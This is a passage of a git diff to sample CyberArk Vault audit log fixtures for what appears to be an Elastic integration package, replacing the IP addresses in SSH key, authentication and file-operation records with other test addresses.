\n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log
index 8c7361274f6..e8abd4c0395 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log
@@ -1 +1 @@
-<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log
index 1420d0a428e..b51cf1be1ff 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log
@@ -1,3 +1,3 @@
-<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 34.123.103.115)\n \n \n testing\n Connect\n \n \n 34.123.103.115\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n 
\n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 34.123.103.115)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"34.123.103.115"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: 
Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 
2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 67.43.156.15)\n \n \n testing\n Connect\n \n \n 67.43.156.15\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 67.43.156.15)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"67.43.156.15"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log
index 283cc15f94e..6cfba6b84db 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/4_user_authentication.log
@@ -1,2 +1,2 @@
-<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}}
+<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}}
 <7>1 2021-03-11T18:03:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:03:43\n 2021-03-11T18:03:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 4\n User Authentication\n Error\n Administrator\n User Authentication\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n User Authentication\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:03:43","IsoTimestamp":"2021-03-11T18:03:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User 
Authentication","GatewayStation":"10.0.1.20"}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log
index f3d9bd31a39..6b4bda22fbe 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/50_store_file.log 
@@ -1,6 +1,6 @@
 <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PVWAAppUser","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
 <5>1 2021-03-10T18:36:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
10:36:22","IsoTimestamp":"2021-03-10T18:36:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 81.32.170.205\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:56Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 67.43.156.13\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}}
 <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n Administrator\n Store File\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Store File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":"10.0.1.20"}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log
index d9d8af79da4..127e5680b04 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/52_delete_file.log 
@@ -1,9 +1,9 @@
 <5>1 2021-03-08T18:32:43Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:43","IsoTimestamp":"2021-03-08T18:32:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <5>1 2021-03-08T18:38:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:38:21","IsoTimestamp":"2021-03-08T18:38:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"VaultInternal","File":"Root\\Operating System-WinServerLocal-components-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinServerLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"LogonDomain","Value":"COMPONENTS"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <5>1 2021-03-08T19:20:04Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 
11:20:04","IsoTimestamp":"2021-03-08T19:20:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PasswordManager","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PasswordManager_workspace","File":"Root\\Test_4","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}}
-<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 35.192.121.42\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}}
+<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 67.43.156.14\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete 
File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}}
 <5>1 2021-03-11T19:32:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:32:12\n 2021-03-11T19:32:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 127.0.0.1\n \n \n \n \n \n Delete File\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:32:12","IsoTimestamp":"2021-03-11T19:32:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"_PSMLiveSessions_1","Value":""},{"Name":"_PSMLiveSessions_2","Value":""},{"Name":"_PSMLiveSessions_3","Value":""},{"Name":"_PSMLiveSessions_4","Value":""},{"Name":"_PSMLiveSessions_5","Value":""}]}}}}
